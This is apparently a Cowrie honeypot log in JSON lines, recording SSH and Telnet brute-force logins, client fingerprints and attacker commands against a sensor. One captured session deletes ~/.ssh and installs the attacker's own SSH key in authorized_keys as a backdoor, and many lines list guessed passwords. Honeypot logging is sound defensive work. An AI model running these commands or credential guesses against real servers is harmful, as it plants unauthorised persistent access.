{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T20:45:37.412545Z","src_ip":"154.92.19.63","session":"ad7b37c84066"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:45:38.294454Z","src_ip":"154.92.19.63","session":"ad7b37c84066"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:45:38.505259Z","src_ip":"154.92.19.63","session":"b0ea3eb2c344"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:45:38.506065Z","src_ip":"154.92.19.63","session":"ad7b37c84066"}
{"eventid":"cowrie.session.connect","src_ip":"14.225.206.98","src_port":58310,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd461e4950d5","protocol":"ssh","message":"New connection: 14.225.206.98:58310 (1.2.3.4:22) [session: cd461e4950d5]","sensor":"my-vps","timestamp":"2025-08-28T20:45:55.899485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T20:45:55.900401Z","src_ip":"14.225.206.98","session":"cd461e4950d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T20:45:56.091640Z","src_ip":"14.225.206.98","session":"cd461e4950d5"}
{"eventid":"cowrie.login.success","username":"root","password":"root.root","message":"login attempt [root/root.root] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:45:56.899333Z","src_ip":"14.225.206.98","session":"cd461e4950d5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:45:57.302279Z","src_ip":"14.225.206.98","session":"cd461e4950d5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T20:45:57.303129Z","src_ip":"14.225.206.98","session":"cd461e4950d5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T20:45:57.304408Z","src_ip":"14.225.206.98","session":"cd461e4950d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:45:57.497040Z","src_ip":"14.225.206.98","session":"cd461e4950d5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:45:57.939248Z","src_ip":"14.225.206.98","session":"cd461e4950d5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T20:45:57.939944Z","src_ip":"14.225.206.98","session":"cd461e4950d5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T20:45:58.137444Z","src_ip":"14.225.206.98","session":"cd461e4950d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:45:58.138513Z","src_ip":"14.225.206.98","session":"cd461e4950d5"}
{"eventid":"cowrie.session.connect","src_ip":"14.225.206.98","src_port":36562,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca510f165321","protocol":"ssh","message":"New connection: 14.225.206.98:36562 (1.2.3.4:22) [session: ca510f165321]","sensor":"my-vps","timestamp":"2025-08-28T20:45:58.327649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T20:45:58.328621Z","src_ip":"14.225.206.98","session":"ca510f165321"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T20:45:58.519457Z","src_ip":"14.225.206.98","session":"ca510f165321"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T20:45:59.326436Z","src_ip":"14.225.206.98","session":"ca510f165321"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:46:00.520392Z","src_ip":"14.225.206.98","session":"ca510f165321"}
{"eventid":"cowrie.session.connect","src_ip":"14.225.206.98","src_port":36568,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8fbd4e8323b","protocol":"ssh","message":"New connection: 14.225.206.98:36568 (1.2.3.4:22) [session: a8fbd4e8323b]","sensor":"my-vps","timestamp":"2025-08-28T20:46:00.725401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T20:46:00.726438Z","src_ip":"14.225.206.98","session":"a8fbd4e8323b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T20:46:00.932341Z","src_ip":"14.225.206.98","session":"a8fbd4e8323b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:46:01.798234Z","src_ip":"14.225.206.98","session":"a8fbd4e8323b"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:46:02.006017Z","src_ip":"14.225.206.98","session":"cd461e4950d5"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:46:02.006970Z","src_ip":"14.225.206.98","session":"a8fbd4e8323b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55123,"dst_ip":"1.2.3.4","dst_port":23,"session":"f0f41f47efb7","protocol":"telnet","message":"New connection: 212.227.235.229:55123 (1.2.3.4:23) [session: f0f41f47efb7]","sensor":"my-vps","timestamp":"2025-08-28T20:47:00.910012Z"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":61105,"dst_ip":"1.2.3.4","dst_port":22,"session":"51589bd72a62","protocol":"ssh","message":"New connection: 80.94.95.15:61105 (1.2.3.4:22) [session: 51589bd72a62]","sensor":"my-vps","timestamp":"2025-08-28T20:47:00.919048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T20:47:00.920508Z","src_ip":"80.94.95.15","session":"51589bd72a62"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T20:47:00.973105Z","src_ip":"80.94.95.15","session":"51589bd72a62"}
{"eventid":"cowrie.login.failed","username":"maria","password":"password","message":"login attempt [maria/password] failed","sensor":"my-vps","timestamp":"2025-08-28T20:47:01.221429Z","src_ip":"80.94.95.15","session":"51589bd72a62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53030,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5e0d83d5a5b","protocol":"ssh","message":"New connection: 212.227.125.160:53030 (1.2.3.4:22) [session: d5e0d83d5a5b]","sensor":"my-vps","timestamp":"2025-08-28T20:47:02.286000Z"}
{"eventid":"cowrie.login.failed","username":"maria","password":"maria","message":"login attempt [maria/maria] failed","sensor":"my-vps","timestamp":"2025-08-28T20:47:02.290102Z","src_ip":"80.94.95.15","session":"51589bd72a62"}
{"eventid":"cowrie.login.failed","username":"maria","password":"abc123","message":"login attempt [maria/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T20:47:03.353922Z","src_ip":"80.94.95.15","session":"51589bd72a62"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:47:03.399531Z","src_ip":"212.227.125.160","session":"d5e0d83d5a5b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:47:03.400176Z","src_ip":"212.227.125.160","session":"d5e0d83d5a5b"}
{"eventid":"cowrie.login.failed","username":"maria","password":"abcd123","message":"login attempt [maria/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T20:47:04.423103Z","src_ip":"80.94.95.15","session":"51589bd72a62"}
{"eventid":"cowrie.login.failed","username":"maria","password":"abcd1234","message":"login attempt [maria/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T20:47:05.488474Z","src_ip":"80.94.95.15","session":"51589bd72a62"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:47:06.541770Z","src_ip":"80.94.95.15","session":"51589bd72a62"}
{"eventid":"cowrie.login.success","username":"root","password":"102030","message":"login attempt [root/102030] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:47:09.207648Z","src_ip":"212.227.125.160","session":"d5e0d83d5a5b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:47:12.093506Z","src_ip":"212.227.125.160","session":"d5e0d83d5a5b"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-28T20:47:12.094192Z","src_ip":"212.227.125.160","session":"d5e0d83d5a5b"}
{"eventid":"cowrie.session.closed","duration":12.94409990310669,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:47:13.854036Z","src_ip":"212.227.235.229","session":"f0f41f47efb7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"2.9","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:47:15.030406Z","src_ip":"212.227.125.160","session":"d5e0d83d5a5b"}
{"eventid":"cowrie.session.closed","duration":"12.7","message":"Connection lost after 12.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:47:15.031646Z","src_ip":"212.227.125.160","session":"d5e0d83d5a5b"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":50830,"dst_ip":"1.2.3.4","dst_port":22,"session":"0609500a7026","protocol":"ssh","message":"New connection: 201.148.180.50:50830 (1.2.3.4:22) [session: 0609500a7026]","sensor":"my-vps","timestamp":"2025-08-28T20:47:19.985298Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:47:20.823207Z","src_ip":"201.148.180.50","session":"0609500a7026"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:47:21.133073Z","src_ip":"201.148.180.50","session":"0609500a7026"}
{"eventid":"cowrie.login.success","username":"root","password":"102030","message":"login attempt [root/102030] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:47:24.932203Z","src_ip":"201.148.180.50","session":"0609500a7026"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:47:28.027468Z","src_ip":"201.148.180.50","session":"0609500a7026"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T20:47:28.028169Z","src_ip":"201.148.180.50","session":"0609500a7026"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:47:29.288146Z","src_ip":"201.148.180.50","session":"0609500a7026"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:47:29.289250Z","src_ip":"201.148.180.50","session":"0609500a7026"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54435,"dst_ip":"1.2.3.4","dst_port":22,"session":"93ceaa0a96d1","protocol":"ssh","message":"New connection: 212.227.125.160:54435 (1.2.3.4:22) [session: 93ceaa0a96d1]","sensor":"my-vps","timestamp":"2025-08-28T20:48:38.439079Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:48:38.598134Z","src_ip":"212.227.125.160","session":"93ceaa0a96d1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53680,"dst_ip":"1.2.3.4","dst_port":22,"session":"48845a8dc54b","protocol":"ssh","message":"New connection: 217.72.205.35:53680 (1.2.3.4:22) [session: 48845a8dc54b]","sensor":"my-vps","timestamp":"2025-08-28T20:48:58.560090Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:48:58.561282Z","src_ip":"217.72.205.35","session":"48845a8dc54b"}
{"eventid":"cowrie.session.connect","src_ip":"79.127.48.196","src_port":55273,"dst_ip":"1.2.3.4","dst_port":22,"session":"595f91353807","protocol":"ssh","message":"New connection: 79.127.48.196:55273 (1.2.3.4:22) [session: 595f91353807]","sensor":"my-vps","timestamp":"2025-08-28T20:53:01.496859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:53:09.360300Z","src_ip":"79.127.48.196","session":"595f91353807"}
